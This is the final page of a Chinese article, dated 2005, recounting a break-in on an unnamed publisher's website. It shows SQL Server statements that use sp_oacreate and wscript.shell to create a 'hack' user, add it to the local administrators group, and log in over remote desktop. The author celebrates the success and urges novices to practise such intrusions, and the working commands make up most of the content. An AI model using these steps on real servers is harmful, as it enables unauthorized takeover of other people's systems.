首页产品库评测行情新闻|手机数码笔记本台式机DIY硬件数字家庭数码相机办公外设|软件下载游戏开发|社区

更多

数码相机
MP4
LCD
机箱
音箱

天极网 > 软件频道>图解:入侵国内某知名出版社网站全记录

图解:入侵国内某知名出版社网站全记录

2005-11-21 10:54作者:小鱼修炼出处:邪恶八进制信息安全团队责任编辑:原野

  晕,xplog70.dll被删了,可恶,既然开了3389只要加个用户就可以了,加用户也不一定要用XP_cmdshell,可以试试别的转储过程,打开"SQL查询分析器分离版本"输入IP和密码点连接,图19

  OK,我们在“查询”中输入:

------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
-----------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
--------------------------------------------------
  这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20

  怎么样?是不是条条大路通罗马?

  用增加的用户登陆3389看看(图21)

  哈哈,成功!任务完成!^_^

  四.小结

  由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的入侵过程了,文章读起来很简单(我在实际中可是遇到很多问题),但要是你实际操作起来可能就会遇到很多问题了,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不仅给大家展示的是一次入侵过程更想把入侵中分析问题的思想传达给各位菜鸟朋友们,由于我水平有限可能文章有很多不足之处,所以还请各位见笑了!


  阅读关于 黑客 黑客入侵 网络安全 木马 的全部文章

关注此文的读者还看过:

返回软件频道首页

共5页。 上一页12345

软件频道最新更新

热点推荐

天极服务|关于我们|About us|网站律师|RSS订阅|友情合作|加入我们|天极动态|网站地图|意见反馈|MSN/QQ上看天极
Copyright (C) 1999-2012 Yesky.com, All Rights Reserved 版权所有 天极网络